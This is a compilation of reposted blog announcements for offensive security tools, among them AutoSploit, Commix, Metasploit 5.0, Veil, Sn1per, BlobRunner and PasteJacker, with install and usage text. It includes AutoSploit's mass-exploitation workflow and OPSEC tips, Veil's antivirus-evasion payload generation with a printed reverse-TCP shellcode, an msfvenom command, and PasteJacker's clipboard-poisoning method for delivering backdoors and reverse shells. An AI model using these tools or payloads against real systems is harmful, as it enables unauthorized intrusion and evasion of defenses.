Kaboom – Automatic Pentest

kaboom is a script that automates the penetration test. It performs several tasks for each phase of pentest:Information gathering [nmap-unicornscan] TCP scanUDP scanVulnerability assessment [nmap-nikto-dirb-searchsploit-msfconsole]It tests several services: smbsshsnmpsmtpftptftpms-sqlmysqlrdphttphttpsand more…It finds the CVEs and then searchs them on exploit-db or Metasploit db. Exploitation [hydra] brute force sshUsagekaboom supports two mode:Interactive mode:kaboom [ENTER] …and the script does the restNON-interactive mode:kaboom <nic> <target_ip> [-s or –shutdown]If you use the shutdown option, kaboom will shutdown the machine at the end of tasks.If you want see this help:kaboom -h (or –help)Directory Hierarchykaboom saves the results of commands in this way:Download Kaboom

Link: http://www.kitploit.com/2019/02/kaboom-automatic-pentest.html

AutoSploit v3.0 – Automated Mass Exploiter

As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is startedOperational Security ConsiderationReceiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.InstallationInstalling AutoSploit is very simple, you can find the latest stable release here. You can also download the master branch as a zip or tarball or follow one of the below methods;Cloningsudo -s << EOFgit clone https://github.com/NullArray/Autosploit.gitcd AutoSploitchmod +x install.sh./install.shpython2 autosploit.pyEOFDockersudo -s << EOFgit clone https://github.com/NullArray/AutoSploit.gitcd AutoSploitchmod +x install.sh./install.shcd AutoSploit/Dockerdocker network create -d bridge haknetdocker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgresdocker build -t autosploit .docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploitEOFOn any Linux system the following should work;git clone https://github.com/NullArray/AutoSploitcd AutoSploitchmod +x install.sh./install.shAutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. In order to accomplish this employ/perform the below operations via the terminal or in the form of a shell script.sudo -s << '_EOF'pip2 install virtualenv --usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFMore information on running Docker can be found hereUsageStarting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows.1. Usage And Legal2. Gather Hosts3. Custom Hosts4. Add Single Host5. View Gathered Hosts6. Exploit Gathered Hosts99. QuitChoosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache in example and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. I’ve posted the options below as well for reference.usage: python autosploit.py -[c|z|s|a] -[q] QUERY [-C] WORKSPACE LHOST LPORT [-e] [–whitewash] PATH [–ruby-exec] [–msf-path] PATH [-E] EXPLOIT-FILE-PATH [–rand-agent] [–proxy] PROTO://IP:PORT [-P] AGENToptional arguments: -h, –help show this help message and exitsearch engines: possible search engines to use -c, –censys use censys.io as the search engine to gather hosts -z, –zoomeye use zoomeye.org as the search engine to gather hosts -s, –shodan use shodan.io as the search engine to gather hosts -a, –all search all available search engines to gather hostsrequests: arguments to edit your requests –proxy PROTO://IP:PORT run behind a proxy while performing the searches –random-agent use a random HTTP User-Agent header -P USER-AGENT, –personal-agent USER-AGENT pass a personal User-Agent to use for HTTP requests -q QUERY, –query QUERY pass your search queryexploits: arguments to edit your exploits -E PATH, –exploit-file PATH provide a text file to convert into JSON and save for later use -C WORKSPACE LHOST LPORT, –config WORKSPACE LHOST LPORT set the configuration for MSF (IE -C default 127.0.0.1 8080) -e, –exploit start exploiting the already gathered hostsmisc arguments: arguments that don’t fit anywhere else –ruby-exec if you need to run the Ruby executable with MSF use this –msf-path MSF-PATH pass the path to your framework if it is not in your ENV PATH –whitelist PATH only exploit hosts listed in the whitelist fileDependenciesNote: All dependencies should be installed using the above installation method, however, if you find they are not:AutoSploit depends on the following Python2.7 modules.requestspsutilShould you find you do not have these installed get them with pip like so.pip install requests psutilorpip install -r requirements.txtSince the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.Download AutoSploit

Link: http://www.kitploit.com/2019/01/autosploit-v30-automated-mass-exploiter.html

Commix v2.7 – Automated All-in-One OS Command Injection And Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos (@ancst) that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.RequirementsPython version 2.6.x or 2.7.x is required for running this program.InstallationDownload commix by cloning the Git repository:git clone https://github.com/commixproject/commix.git commixCommix comes packaged on the official repositories of the following Linux distributions, so you can use the package manager to install it!ArchStrikeBlackArch LinuxBackBoxKali LinuxParrot Security OSWeakerthan LinuxCommix also comes as a plugin, on the following penetration testing frameworks:TrustedSec’s Penetration Testers Framework (PTF)OWASP Offensive Web Testing Framework (OWTF)CTF-ToolsPentestBoxPenBoxKatoolinAptive’s Penetration Testing toolsHomebrew Tap – Pen Test Tools Supported PlatformsLinuxMac OS XWindows (experimental)UsageTo get a list of all options and switches use:python commix.py -hQ: Where can I check all the available options and switches?A: Check the ‘usage’ wiki page.Usage ExamplesQ: Can I get some basic ideas on how to use commix?A: Just go and check the ‘usage examples’ wiki page, where there are several test cases and attack scenarios.Upload ShellsQ: How easily can I upload web-shells on a target host via commix?A: Commix enables you to upload web-shells (e.g metasploit PHP meterpreter) easily on target host. For more, check the ‘upload shells’ wiki page.Modules DevelopmentQ: Do you want to increase the capabilities of the commix tool and/or to adapt it to our needs?A: You can easily develop and import our own modules. For more, check the ‘module development’ wiki page.Command Injection TestbedsQ: How can I test or evaluate the exploitation abilities of commix?A: Check the ‘command injection testbeds’ wiki page which includes a collection of pwnable web applications and/or VMs (that include web applications) vulnerable to command injection attacks.Exploitation DemosQ: Is there a place where I can check for demos of commix?A: If you want to see a collection of demos, about the exploitation abilities of commix, take a look at the ‘exploitation demos’ wiki page.Bugs and EnhancementsQ: I found a bug / I have to suggest a new feature! What can I do?A: For bug reports or enhancements, please open an issue here.Presentations and White PapersQ: Is there a place where I can find presentations and/or white papers regarding commix?A: For presentations and/or white papers published in conferences, check the ‘presentations’ wiki page.Download Commix

Link: http://feedproxy.google.com/~r/PentestTools/~3/mjOk7rQhp2Y/commix-v27-automated-all-in-one-os.html

Metasploit 5.0 – The World’s Most Used Penetration Testing Framework

Knowledge is power, especially when it’s shared. A collaboration between the open source community and Rapid7, Metasploit helps security teams do more than just verify vulnerabilities, manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.Rapid7 announced the release of Metasploit 5.0, the new version includes several new important features and, the company believes it will easier to use and more powerful.Metasploit is the most widely used penetration testing framework and it has more than 1500+ modules that deliver functionalities covering every phase of a penetration test, making the life of a penetration tester comparatively easier. Most important changes introduced in the Metasploit 5.0 include new database and automation APIs, evasion modules and libraries, language support, improved performance.Metasploit 5.0 is currently available from its official GitHub project. Rapid7 says it’s in the process of informing third-party developers that Metasploit 5.0 is stable – Linux distributions such as Kali and ParrotSec are shipped with Metasploit.Metasploit 5.0 Release NotesMetasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.The following is a high-level overview of Metasploit 5.0’s features and capabilities.Metasploit users can now run the PostgreSQL database by itself as a RESTful service, which allows for multiple Metasploit consoles and external tools to interact with it.Parallel processing of the database and regular msfconsole operations improves performance by offloading some bulk operations to the database service.A JSON-RPC API enables users to integrate Metasploit with additional tools and languages.This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services here.Adds evasion module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules here. Rapid7’s first evasion modules are here.The metashell feature allows users to run background sessions and interact with shell sessions without needing to upgrade to a Meterpreter session.External modules add Metasploit support for Python and Go in addition to Ruby.Any module can target multiple hosts by setting RHOSTS to a range of IPs, or by referencing a hosts file with the file:// option. Metasploit now treats RHOST and RHOSTS as identical options.An updated search mechanism improves Framework start time and removes database dependency.Download Metasploit 5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/WdwaF60VaxA/metasploit-50-worlds-most-used.html

Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.Veil is current under support by @ChrisTruncerSoftware Requirements:The following OSs are officially supported:Debian 8+Kali Linux Rolling 2018.1+The following OSs are likely able to run Veil:Arch LinuxBlackArch LinuxDeepin 15+ElementaryFedora 22+Linux MintParrot SecurityUbuntu 15.10+SetupKali’s Quick Installapt -y install veil/usr/share/veil/config/setup.sh –force –silentGit’s Quick InstallNOTE:Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with sudo or change to the root user before beginning.Your package manager may be different to apt.sudo apt-get -y install gitgit clone https://github.com/Veil-Framework/Veil.gitcd Veil/./config/setup.sh –force –silent./config/setup.sh // Setup FilesThis file is responsible for installing all the dependences of Veil. This includes all the WINE environment, for the Windows side of things. It will install all the necessary Linux packages and GoLang, as well as Python, Ruby and AutoIT for Windows. In addition, it will also run ./config/update-config.py for your environment.It includes two optional flags, –force and –silent:–force ~ If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.–silent ~ This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.This can be ran either by doing: ./Veil.py –setup OR ./config/setup.sh –force../config/update-config.py // Regenerating Configuration fileThis will generate the output file for /etc/veil/settings.py. Most of the time it will not need to be rebuilt but in some cases you might be prompted to do so (such as a major Veil update).It is important that you are in the ./config/ directory before executing update-config.py. If you are not, /etc/veil/settings.py will be incorrect and when you launch Veil you will see the following: Main Menu 0 payloads loadedDon’t panic. Run either: ./Veil.py –config OR cd ./config/; ./update-config.py.Py2ExeNOTE: Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).MANUALLY Install on a Windows Computer (as this isn’t done by Veil’s setup):Python 3.3Py2ExePyCryptoPyWin32Example UsageVeil’s Main Menu:$ ./Veil.py=============================================================================== Veil | [Version]: 3.1.6=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================================================Main Menu 2 tools loadedAvailable Tools: 1) Evasion 2) OrdnanceAvailable Commands: exit Completely exit Veil info Information on a specific tool list List available tools options Show Veil configuration update Update Veil use Use a specific toolVeil>:Help$ ./Veil.py –helpusage: Veil.py [–list-tools] [-t TOOL] [–update] [–setup] [–config] [–version] [–ip IP] [–port PORT] [–list-payloads] [-p [PAYLOAD]] [-o OUTPUT-NAME] [-c [OPTION=value [OPTION=value …]]] [–msfoptions [OPTION=value [OPTION=value …]]] [–msfvenom ] [–compiler pyinstaller] [–clean] [–ordnance-payload PAYLOAD] [–list-encoders] [-e ENCODER] [-b \x00\x0a..] [–print-stats]Veil is a framework containing multiple tools.[*] Veil Options: –list-tools List Veil’s tools -t TOOL, –tool TOOL Specify Veil tool to use (Evasion, Ordnance etc.) –update Update the Veil framework –setup Run the Veil framework setup file & regenerate the configuration –config Regenerate the Veil framework configuration file –version Displays version and quits[*] Callback Settings: –ip IP, –domain IP IP address to connect back to –port PORT Port number to connect to[*] Payload Settings: –list-payloads Lists all available payloads for that tool[*] Veil-Evasion Options: -p [PAYLOAD] Payload to generate -o OUTPUT-NAME Output file base name for source and compiled binaries -c [OPTION=value [OPTION=value …]] Custom payload module options –msfoptions [OPTION=value [OPTION=value …]] Options for the specified metasploit payload –msfvenom [] Metasploit shellcode to generate (e.g. windows/meterpreter/reverse_tcp etc.) –compiler pyinstaller Compiler option for payload (currently only needed for Python) –clean Clean out payload folders[*] Veil-Ordnance Shellcode Options: –ordnance-payload PAYLOAD Payload type (bind_tcp, rev_tcp, etc.)[*] Veil-Ordnance Encoder Options: –list-encoders Lists all available encoders -e ENCODER, –encoder ENCODER Name of shellcode encoder to use -b \x00\x0a.., –bad-chars \x00\x0a.. Bad characters to avoid –print-stats Print information about the encoded shellcode$Veil Evasion CLI$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py –ip 127.0.0.1 –port 4444=============================================================================== Veil-Evasion=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================================================runtime/internal/sysruntime/internal/atomicruntimeerrorsinternal/racesync/atomicmathsynciounicode/utf8internal/syscall/windows/sysdllunicode/utf16syscallstrconvreflectencoding/binarycommand-line-arguments=============================================================================== Veil-Evasion=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== [*] Language: go [*] Payload Module: go/meterpreter/rev_tcp [*] Executable written to: /var/lib/veil/output/compiled/payload.exe [*] Source code written to: /var/lib/veil/output/source/payload.go [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc$$ file /var/lib/veil/output/compiled/payload.exe/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows$Veil Ordnance CLI$ ./Veil.py -t Ordnance –ordnance-payload rev_tcp –ip 127.0.0.1 –port 4444=============================================================================== Veil-Ordnance=============================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=============================================================================== [*] Payload Name: Reverse TCP Stager (Stage 1) [*] IP Address: 127.0.0.1 [*] Port: 4444 [*] Shellcode Size: 287\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3$Download Veil

Link: http://www.kitploit.com/2018/12/veil-tool-to-generate-metasploit.html

Sn1per v6.0 – Automated Pentest Framework For Offensive Security Experts

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.SN1PER PROFESSIONAL FEATURES:Professional reporting interfaceSlideshow for all gathered screenshotsSearchable and sortable DNS, IP and open port databaseCategorized host reportsQuick links to online recon tools and Google hacking queriesPersonalized notes field for each hostDEMO VIDEO:SN1PER COMMUNITY FEATURES: Automatically collects basic recon (ie. whois, ping, DNS, etc.) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers Automatically checks for sub-domain hijacking Automatically runs targeted NMap scripts against open ports Automatically runs targeted Metasploit scan and exploit modules Automatically scans all web applications for common vulnerabilities Automatically brute forces ALL open services Automatically test for anonymous FTP access Automatically runs WPScan, Arachni and Nikto for all web services Automatically enumerates NFS shares Automatically test for anonymous LDAP access Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities Automatically enumerate SNMP community strings, services and users Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers Automatically tests for open X11 servers Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds Performs high level enumeration of multiple hosts and subnets Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting Automatically gathers screenshots of all web sites Create individual workspaces to store all scan outputAUTO-PWN:Drupal Drupalgedon2 RCE CVE-2018-7600GPON Router RCE CVE-2018-10561Apache Struts 2 RCE CVE-2017-5638Apache Struts 2 RCE CVE-2017-9805Apache Jakarta RCE CVE-2017-5638Shellshock GNU Bash RCE CVE-2014-6271HeartBleed OpenSSL Detection CVE-2014-0160Default Apache Tomcat Creds CVE-2009-3843MS Windows SMB RCE MS08-067Webmin File Disclosure CVE-2006-3392Anonymous FTP AccessPHPMyAdmin Backdoor RCEPHPMyAdmin Auth BypassJBoss Java De-Serialization RCE’sKALI LINUX INSTALL:./install.shDOCKER INSTALL:Credits: @menzowDocker Install: https://github.com/menzow/sn1per-dockerDocker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/Example usage:$ docker pull menzo/sn1per-docker$ docker run –rm -ti menzo/sn1per-docker sniper menzo.ioUSAGE:[*] NORMAL MODEsniper -t|–target [*] NORMAL MODE + OSINT + RECONsniper -t|–target <TARGET> -o|–osint -re|–recon[*] STEALTH MODE + OSINT + RECONsniper -t|–target <TARGET> -m|–mode stealth -o|–osint -re|–recon[*] DISCOVER MODEsniper -t|–target <CIDR> -m|–mode discover -w|–workspace <WORSPACE_ALIAS>[*] SCAN ONLY SPECIFIC PORTsniper -t|–target <TARGET> -m port -p|–port <portnum>[*] FULLPORTONLY SCAN MODEsniper -t|–target <TARGET> -fp|–fullportonly[*] PORT SCAN MODEsniper -t|–target <TARGET> -m|–mode port -p|–port <PORT_NUM>[*] WEB MODE – PORT 80 + 443 ONLY!sniper -t|–target <TARGET> -m|–mode web[*] HTTP WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttp -p|–port <port>[*] HTTPS WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttps -p|–port <port>[*] ENABLE BRUTEFORCEsniper -t|–target <TARGET> -b|–bruteforce[*] AIRSTRIKE MODEsniper -f|–file /full/path/to/targets.txt -m|–mode airstrike[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLEDsniper -f–file /full/path/to/targets.txt -m|–mode nuke -w|–workspace <WORKSPACE_ALIAS>[*] ENABLE LOOT IMPORTING INTO METASPLOITsniper -t|–target <TARGET>[*] LOOT REIMPORT FUNCTIONsniper -w <WORKSPACE_ALIAS> –reimport[*] UPDATE SNIPERsniper -u|–updateMODES:NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.FULLPORTONLY: Performs a full detailed port scan and saves results to XML.WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.UPDATE: Checks for updates and upgrades all components used by sniper.REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.RELOAD: Reload the master workspace report.SAMPLE REPORT:https://gist.github.com/1N3/8214ec2da2c91691bcbcDownload Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/RLWB_3_Wk9M/sn1per-v60-automated-pentest-framework.html

BlobRunner – Quickly Debug Shellcode Extracted During Malware Analysis

BlobRunner is a simple tool to quickly debug shellcode extracted during malware analysis.BlobRunner allocates memory for the target file and jumps to the base (or offset) of the allocated memory. This allows an analyst to quickly debug into extracted artifacts with minimal overhead and effort.To use BlobRunner, you can download the compiled executable from the releases page or build your own using the steps below.BuildingBuilding the executable is straight forward and relatively painless.RequirementsDownload and install Microsoft Visual C++ Build Tools or Visual StudioBuild StepsOpen Visual Studio Command PromptNavigate to the directory where BlobRunner is checked outBuild the executable by running:cl blobrunner.cBuilding BlobRunner x64Building the x64 version is virtually the same as above, but simply uses the x64 tooling.Open x64 Visual Studio Command PromptNavigate to the directory where BlobRunner is checked outBuild the executable by running: cl /Feblobrunner64.exe /Foblobrunner64.out blobrunner.cUsageTo debug:Open BlobRunner in your favorite debugger.Pass the shellcode file as the first parameter.Add a breakpoint before the jump into the shellcodeStep into the shellcodeBlobRunner.exe shellcode.binDebug into file at a specific offset.BlobRunner.exe shellcode.bin –offset 0x0100Debug into file and don’t pause before the jump. Warning: Ensure you have a breakpoint set before the jump.BlobRunner.exe shellcode.bin –nopauseDebugging x64 ShellcodeInline assembly isn’t supported by the x64 compiler, so to support debugging into x64 shellcode the loader creates a suspended thread which allows you to place a breakpoint at the thread entry, before the thread is resumed.Remote Debugging Shell Blobs (IDAPro)The process is virtually identical to debugging shellcode locally – with the exception that the you need to copy the shellcode file to the remote system. If the file is copied to the same path you are running win32_remote.exe from, you just need to use the file name for the parameter. Otherwise, you will need to specify the path to the shellcode file on the remote system.Shellcode SamplesYou can quickly generate shellcode samples using the Metasploit tool msfvenom.Generating a simple Windows exec payload.msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -o test2.binFeedback / HelpAny questions, comments or requests you can find us on twitter: @seanmw or @herrcorePull requests welcome!Download BlobRunner

Link: http://feedproxy.google.com/~r/PentestTools/~3/0kcKLQrdZYA/blobrunner-quickly-debug-shellcode.html

DarkSpiritz v2.0 – A Penetration Testing Framework For Linux, MacOS, And Windows Systems

A penetration testing framework for Linux and Windows systems.What is DarkSpiritz?Created by the SynTel Team it was a project of one of the owners to update and clean-up an older pentesting framework he had created to something updated and modern. DarkSpiritz is a re-vamp of the very popular framework known as “Roxysploit". You may be familiar with this framework and if you are then it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework known as Metasploit. If you know how to use metasploit setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins or you can head to our wiki here. If you need any help feel free to contact us at syndicatedintel@protonmail.com.Syntel Team:M4cs | @maxbridglandRyan | @ryan0x1Version 2.0 UPDATE (READ IMPORTANT)This version should run a lot smoother and have a cleaner UI. Check the reddit post here to see all changes: https://www.reddit.com/r/netsec/comments/9skdju/huge_update_to_darkspiritz_pentesting_framework/Getting StartedClone the repository with git:git clone https://github.com/DarkSpiritz/DarkSpiritz.gitDarkSpiritz wiki available hereTo install DarkSpiritz clone the github repo and run:pip install -r requirements.txtThis will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:python start.pyor./start.py(if ./start.py doesn’t work run chmod +x start.py from within the same directory as DarkSpiritz.)You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.Features:These are features that DarkSpiritz Team prides themself on based on this program:Real Time Updating of ConfigurationNever a need to restart the program even when adding plugins or editing them.Easy to use UXMulti-functionalityDownload DarkSpiritz

Link: http://feedproxy.google.com/~r/PentestTools/~3/_qFlgmuW1Is/darkspiritz-v20-penetration-testing.html

PasteJacker – Add PasteJacking To Web-Delivery Attacks

The main purpose of the tool is automating (PasteJacking/Clipboard poisoning/whatever you name it) attack with collecting all the known tricks used in this attack in one place and one automated job as after searching I found there’s no tool doing this job the right way.Now while this attack depends on what the user will paste, imagine adding this attack to Metasploit web delivery module.See this simple scenario to make things clear:The target opens an HTML page served by the tool and this page has anything that makes the wants to copy from it to the terminal like some installation instructions.Target copies a thing from the page then it replaced quickly with our line.The user pastes it in the terminal and before he notices that the line changed, the line gets executed by itself in the background and the terminal gets cleared.All of that happened in a second and the user sees the terminal is usable again and maybe thinks this is a bad program and he won’t install it but you already got your meterpreter shell.This tool uses 3 methods to trick user into copying our payload instead of the command he copies: Using javascript to hook the copy event and replace copied data. Advantages :Anything the user copies in the page will be replaced with our line.Command executed by itself once target paste it without pressing enter.Disadvantages :Requires Javascript to be enabled on the target browser. Using span style attribute to hide our lines by overwriting. Advantages :Doesn’t require javascript to be enabled.Works on all browsers.Disadvantages :Target must select all the text in the page or the first two words to ensure that he copies our hidden malicious lines. Using span style again but this time to make our text transparent and non-markable. Advantages :Doesn’t require javascript to be enabled.Disadvantages :Target must select all the text in the page to ensure that he copies our hidden malicious lines.Not working on opera and chrome.What’s the payload user copies ?PasteJacker gives you the option to do one of this things:Generate a msfvenom backdoor on our machine and the liner target gonna copy will download the backdoor on the its machine, through wget or certutil depends on the OS, then executes it on the background without printing anything to the terminal.Serve a liner that gets you a reverse netcat connection on the target machine running in the background of course.Serve your custom liner like Metasploit web-delivery payload with adding some touches to hide any possible output.ScreenshotsInstalling and requirementsPython 3 and setuptools module.Linux or Unix-based system (Currently tested only on Kali Linux rolling and Ubuntu 16.04).Third-party requirements like msfvenom but only if you are gonna use the msfvenom option of course.Third-party library ncurses-dev for Ubuntu (Thanks for @mhaskar).Root access.InstallingFor Linux :git clone https://github.com/D4Vinci/PasteJacker.gitsudo python3 -m pip install ./PasteJackersudo pastejackerUpdating the framework or the databaseOn Linux while outside the directorycd PasteJacker && git pull && cd ..sudo python3 -m pip install ./PasteJacker –upgradeReferencesPasteJacking GitHub repoClipboard poisoning attacks on the Mac – MalwarebytesMetasploit web delivery module ContactTwitterDisclaimerPasteJacker is created to help in penetration testing and it’s not responsible for any misuse or illegal purposes.Copying a code from this tool or using it in another tool is accepted as you mention where you get it from.Pull requests are always welcomed :DDownload PasteJacker

Link: http://feedproxy.google.com/~r/PentestTools/~3/oO5iiRHaY_4/pastejacker-add-pastejacking-to-web.html

UPDATED VERSION: RouterSploit 3.4.0

PenTestIT RSS Feed
RouterSploit 3.4.0, the long awaited router exploitation framework update is out guys! This release includes some really cool features and updates such as using pycryptodome from pycryptoand newer exploitation modules! Read on for the improvements. What is RouterSploit? The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the followingRead more about UPDATED VERSION: RouterSploit 3.4.0
The post UPDATED VERSION: RouterSploit 3.4.0 appeared first on PenTestIT.

Link: http://pentestit.com/updated-version-routersploit-3-4-0/